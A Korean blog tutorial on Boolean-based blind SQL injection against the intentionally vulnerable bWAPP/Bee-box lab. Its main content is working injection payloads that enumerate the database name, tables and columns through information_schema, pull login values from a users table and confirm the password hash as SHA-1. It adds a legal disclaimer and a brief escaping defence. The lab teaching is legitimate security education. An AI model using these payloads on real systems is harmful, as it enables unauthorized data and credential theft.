[Bee-box] Blind SQL 인젝션 - Boolean Based

이번 포스팅은 Blind SQL인젝션  Boolean Based 방법 입니다.

 

실습하는 모든 공격은 실제로 사용하시면 안됩니다.

허용받지 않은 서비스 대상에 해킹을 시도하는 행동은 금지하며,

모든 법적 책임은 사용자에게 있는 것을 명심해주세요.

 

설명에 앞서, 앞으로 하는 SQL 인젝션의 일부 공격들은 대응방안을 따로 포스팅 하지 않을게요. 

대부분 같은 설명이기 때문에 생략하고, 다른 경우 기재하도록 하겠습니다.

 

 

---

 

오늘 실습해볼 Blind SQL인젝션은 전에 해왔던 SQL인젝션과는 조금 다른 방식이므로, 

 

 

Blind SQL인젝션을 먼저 설명 드리고 실습을 시작하도록 하겠습니다.

 

 

Blind SQL 인젝션이란

 

'Blind SQL' 인젝션은 쿼리의 결과를 참과 거짓으로만 출력하는 페이지에서 사용하는 공격이다.

출력 내용이 참 / 거짓 밖에 없어서 그것을 이용하여 데이터베이스의 내용을 추측하여 쿼리를 조작한다.

 

 

자세한 설명 ▼

Blind SQL 인젝션의 쿼리문에 사용하는 함수는 

substring,ascii,limit 등이 있다. (각 함수는 아래의 실습을 할 때 더욱 이해쉽게 설명할 예정)

 

substring함수는 첫 번째 인자로 받은 문자열을 지정한 길이만큼 출력하는데, 주로 문자 하나씩 출력 하여 이름을

알아내는데에 사용한다.

 

ascii함수는 문자를 아스키코드로 변환하는데, 작은따옴표(')를 우회하는 변수일 때 문자를 입력하기 위하여 사용한다.

 

limit 함수는 문자열의 길이를 반환한다. 문장열의 길이를 알아내면 substring 함수로 문자열을 추측하기 쉬워진다.

 

세함수를 통해 임의의 값을 입력하며 데이터베이스 내용을 알아낼 때까지 계속 비교한다.

 

 

 

공격흐름도

 

 

SQL인젝션 공격흐름과 얼핏보면 같지만, blind sql은 참,거짓으로만 출력시킴

 

 

 

 

Boolean Based 

 

Bollean Based 인젝션은 참과 거짓만 출력하는 페이지에 공격자가 조작한 쿼리로 인해 데이터베이스 내용을

노출하는 취약점이다. 쿼리는 데이터베이스 내용이 일치하여 웹 페이지에서 참을 출력시킬 때까지 임의의 값을 대입한다.

 

 

 

 

'sqli_4.php' 페이지는 사용자가 입력한 검색어와 일치하는 영화가 데이터베이스에 있는지를 출력한다.

 

 

 

 

난이도 하

검색란에 작옴따옴표를 입력하여 SQL 인젝션이 가능한지 알아본다.

 

SQL인젝션 취약점이 있는 경우 SQL오류 메시지를 출력함.

 

 

 

 

문법 에러 : 즉 SQL인젝션 공격이 가능하다는 뜻

 

 

 

 

결과를 항상 참으로 만드는 쿼리 입력시 아래 영화가 존재한다는 메시지가 출력된다.

즉 결과가 참 일때 웹 페이지에서 출력하는 메시지이다.

 

이 검색란을 통해 boolean based sql 인젝션 공격이 가능하다.

 

 

 

 

결과가 거짓인 경우 아래와 같은 메세지가 출력된다.

 

모든 결과를 두 문장으로 출력시켜 줌으로, 이 두 메세지를 통하여 쿼리의 참과 거짓 여부를 판단 할 수 있다.

 

 

- 필수 코스 -

 

1. SQL인젝션 확인  -> 오류메세지 (작은따옴표 찍어서)
2. 에러메세지 확인 (참일때 메세지와 거짓일때 메세지))
3. 컬럼수 맞춰보기(union base sql injection) 앞과 이어서 확인할 수 있음.

 

 

 

 

참 거짓 메세지로 앞에 쿼리문 컬럼 수가 7개 라는 것을 알 수 있다.

즉 이 페이지의 정상 쿼리는 총 7개의 칼럼을 호출한다.

 

 

---

 

기존의 UNION Based SQL인젝션과 다르게 결과를 출력하지 않고 

데이터베이스 내에 있는지 체크만 해주기 때문에 안에 내용을 유추하여, 인젝션을 시도해야한다. 

 

 

 

이제부터 substring, length, limit, ascii 등의 함수를 사용해서 내용을 추측해보겠다. 

 

 

<!-- 블라인드 SQL인젝션은 매우 노가다를 해야합니다... 그렇기 때문에

파이썬으로 코드를 짜서 해보시면 겸사겸사 좋을 것 같아요! -->

 

 

 

DB에 내용이 있느냐 없느냐만 확인이 가능하기 때문에, 길이,이름 등 모든 정보가 없다. 즉 아래와 같은 순서로

파악을 해주는 것이 중요하다.

 

 

 

1. 데이터 베이스 이름 (의 길이) ---> 글자 길이 파악

   1.1 데이터 베이스 이름 --> 글자 길이에 맞춰 한 글자씩 파악

 

2.  테이블 이름(의 길이) --> 테이블은 한두개가 아님

(즉, 여러개의 테이블 중 의심이 가는 테이블 이름을 아려면, 1번째 줄부터 이어 나가서 알아야함

ex : 첫번째 테이블 이름의 길이 구하고 이름 유추 -- > 두번째 테이블 이름 길이 구하고 이름 유추하기 .....등 원하는

테이블이 나올 때까지 반복)

 

 

3. 컬럼 이름(의 길이) --> 컬럼 또한 한두개가 아님

 

4. 데이타 추출하기 (pw같은경우 해시값일 확률이 높음.)

 

---

 

눈으로 테이블과 컬럼들을 확인해가며, 실습을 해야 이해가 빠르기 때문에 putty로 접속하여 DB내부를 확인해본다.

 

 

 

1. DB이름의 길이 파악하기

 

'or 1=1 and  length(database())=1# 
'or 1=1 and  length(database())=2# 
'or 1=1 and  length(database())=3# 
'or 1=1 and  length(database())=4# 
'or 1=1 and  length(database())=5# -> ok DB이름은 뭔진 모르지만 5글자.

--> database이름의 길이는 '5' 
즉 5글자라는 것을 알아낼 수 있음 

and가 우선순위가 높아서 먼저 하고 or 연산을 함 
and 연산 후 or 1=1 쿼리를 통해 서버의 정상쿼리와 연결된다.

 

 

substring() 함수를 사용하면, 
그 단어에 대한 글자 하나하나를 파악 할 수 있다.


한글자 씩 맞춰야 하는데 어떻게 맞춰야 할까?

바로 substring을 이용해서 단어의 한글자씩 맞추는 것이다.

1-1. DB 이름 파악 

 

첫번째 글자에 a-z 아무 알파벳을 넣어본다.

'or 1=1 and substring(database(),1,1) = 'a' # -> 거짓 결과 반환
'or 1=1 and substring(database(),1,1) = 'b' # -> 참 결과 반환

--> 즉 b _ _ _ _ 라는 것을 알 수 있음

substring 의 첫번째 인자는  database이름을 알려주는 정의 함수를 넣었습니다.

두번째 인자는 첫번째 인덱스 값을 말하며 substring에서 첫번째 인덱스는 0이아닌 1입니다. 
세번째 인자는 몇글자를 추출할것인지?로 이해해도 될 것같습니다.

ex)  substring('abcd',1,3) 이라면 처음 값인 a부터 3개를 출력 즉 abc가 해당되는 거죠.

 

두번째 글자를 알아보려면 

'or 1=1 and substring(database(),2,1)='w'# 라는 쿼리문을 써줍니다.

(우리는 bwapp라는 db이름을 알고 있기 때문에 과정을 생략한 것, 만약 이름을 모른다면 a-z,0-9,A-Z,-,_등등..입력해봐야함. )

 

 

두번째 인덱스 값만 바꿔주면 각 글자를 파악 할 수 있다. 

근데 W와 w모두 참으로 값을 돌려주는 것을보니 대소문자 구분x

이런식으로 5번째 글자 까지 무엇인지 구해줄 수 있다.

 

2. Table이름의 길이 파악

 

 

즉 bWAPP라는 데이터 베이스에 첫번째 테이블 이름은 4글자라는 것을 유추 할 수 있다.

 

 

이쿼리에 대한 자세한 설명은 아래 참고 ▼

* 여기서 limit는 substring 과 조금 다르게 한 글자가 아니라 한 단어를 가져온다고 이해 하시면 됩니다.

* limit함수는 첫번째 인덱스를 substring 과 다르게 0으로 하며, 뒤에 오는 숫자는 역시 몇개의 단어를 가져오느냐 로 이해 하시면 될것같습니다. ->  limit 0,1 은 제일 위 처음 단어를 가져오겠다는 뜻.

 

 

 

위 테이블을 보고 설명하자면 limit 0,1 은 blog를 의미 (즉 4글자가 맞음)

limit 1,1 은 heroes를 말함

ex) limit 1,3은 heroes부터 3개 즉, heroes, movies, users를 뜻함

 

* 괄호를 두번 쳐줄지에 대해 저는 개인적으로 의문이 생겼었습니다.  그래서 제가 찾아본 결과

length는 한 변수에 대한 값, 즉 무언가 한 값에 대한 길이를 반환해 주는 함수인데 
select 문이 그냥 들어갈 수는 없다. -> 괄호를 한번더 해서 그 안에서 limit 로 제일 첫번째 값 즉 blog 라는 문자열을 length함수에 넣는다 -> 그럼 그 blog에 대한 길이를 맞출 수 있음.

이렇게 이해하시면 될 것 같습니다.

 

* type 이라고 지정해둔 이유는 base table을사용하면 특정하게 지정한 그 테이블에 대한 정보만 볼 수 있다.

bee-box 교재에서는 테이블 타입을 지정하면 information_Schema에 있는 메타데이터 저장용 테이블을 제외 한다고 되어있다. 

 

-->즉, bWAPP 데이터베이스의 대한 테이블만 출력을 시킬거고, information_schema에 있는 메타데이타는 제외하여 출력한다는 쿼리이다.

https://www.mssqltips.com/sqlservertutorial/196/informationschematables/

 

위 주소 참고

 

2-1. Table이름 파악

 

이제 이 table의 이름을 맞춰본다고 가정할때 substring으로 a,b,c,d ..이렇게 다 하나씩 일일이 하기엔

시간이 오래걸리므로, ascii 함수를 사용한다.

 

이 함수로 범위를 한정하여 알아내면 범위가 좁혀지므로 훨씬 시간이 단축 된다.

 

 

아스키 값중 a-z만 가져와봄.

 

예시 >> 'or 1=1 and ascii(x)
-> x안에는 substring 함수 즉 substring(y)
-> y안에는 (z),1,1 한글자를 가져올 대상인 무언가의 값 z,1,1
-> z = select 쿼리문 -> 즉 첫번째 테이블이름 
-->합쳐지면

'or 1=1 and ascii(substring((select table_name from information_schema.tables where table_type='base table'  and table_schema='bWAPP' limit 0,1),1,1)) > 100#

 

 

 

100보다 앞에 쿼리문이 큰가? 

 

결과 =no 

즉 100보다 작은 수를 입력하면 된다. ascii 코드로 100은 'd' 
d보다 아래인 c,b,a를 입력해보면 된다.

 

 

'or 1=1 and ascii(substring((select table_name from information_schema.tables where table_type='base table'  and table_schema='bWAPP' limit 0,1),1,1)) = 98#

 

 

 

결과 = ok 

참이므로,  첫번째 테이블에 이름은 b _ _ _ 이라는 것을 알 수 있다.

 

 

1)번째 글자
'or 1=1 and ascii(substring((select table_name from information_schema.tables where table_type='base table'  and table_schema='bWAPP' limit 0,1),1,1)) = 98#

 

2)번째 글자

'or 1=1 and ascii(substring((select table_name from information_schema.tables where table_type='base table'  and table_schema='bWAPP' limit 0,1),2,1)) = 108#

 

두번째 글자를 알아볼때는 limit함수는 그대로 (DB목록중 첫번째 줄의 단어이므로) 하고, substring의 

시작 인덱스를 2로 바꿔주면 된다.

 

...이런식으로 쭉 알아보다 보면

users 라는 테이블을 찾게 될 것이다.

 

(네번째에 테이블이 있음. )

 

사용자 계정 정보가 담겨있을 것 같기 때문에 이 테이블의 내용을 파악해보면 된다.

 

3. Column 이름의 길이 파악


bWAPP라는 데이타베이스의  users라는 테이블.

그럼 users의 컬럼을 알아보기 위해 첫번째 컬럼부터 길이를 알아본다.

 

'or 1=1 and length((select column_name from information_schema.columns where table_schema='bWAPP' and table_name='users' limit 0,1))=2#

첫번째 컬럼은 두글자이다.

 

 

3-1. Column 이름 파악

1번째 글자 :
'or 1=1 and substring((select column_name from information_schema.columns where table_schema='bWAPP' and table_name='users' limit 0,1 ),1,1)='i'#

 

2 번쨰 글자 : 
'or 1=1 and substring((select column_name from information_schema.columns where table_schema='bWAPP' and table_name='users' limit 0,1 ),2,1)='d'#

 

즉 첫번째 컬럼 = id 

 

이런식으로 글자 길이와 첫번째글자를 알면 대강 유추 할 수도 있음.

 

 

이런식으로 login이라는 두번째 컬럼명을 알았냈다고, 가정할때 login 에 데이터를 파악하려면

 

 

1번째 데이터 : 
 'or 1=1 and length((select login from users limit 0,1))=6#

 

2번째 data : 
'or 1=1 and length((select login from users limit 1,1))=3#

처음 글자수는 A.I.M.(6글자)  두번째 글자수는 bee(3글자) 인것을 알 수 있음.

같은 방식으로 내용도 파악 할 수 있음.

 

---

 

다 비슷한 맥락이므로

length, ascii, limit, substring 함수만 잘 이해한다면 blind sql 쿼리문을 만드는 것이 그리 어렵지 않을 것입니다.

나머지 쿼리는 생략하고 password를 알았을 때를 가정하여 무슨 해시함수를 쓰는지 알아보겠습니다.


password는 해시값으로 이루어져 있는데, 

 

blind sql인젝션을 통해 추측이 가능하나, 일일이 확인하기엔 시간이 너무 오래 걸리기 때문에,

비밀번호에 어떤 해시 함수를 사용하는지 알아보도록 하겠다.

(이부분에 대해서는 sql injection 자동화툴을 파이썬을 사용해서 만들어 보려 한다.)



이건 password를 알고 있다고 가정하고 하는 것임 (login ='bee'의 패스워드는 bug를 sha-1 해시값으로 변환한 값)


'or 1=1 and md5("bug")=(select password from users where login='bee')#

 

 

결과 값 = 거짓 

즉 이 비밀번호에 해시 함수는 md5가 아니다.

 

'or 1=1 and sha1("bug")=(select password from users where login='bee')#
 

 

결과 값 = 참

 

따라서 비박스에서는 비밀번호 해시 함수를 SHA-1 함수를 사용했음을 알 수 있다.

 

 

SQL 인젝션 성공

 

 

대응 방안은 앞에 실습해왔던 SQL인젝션의 대응방안과 동일함으로, 생략하겠습니다.

PHP 기본 제공함수 mysql_real_escape_string()함수 사용하여 입력한 데이터 우회.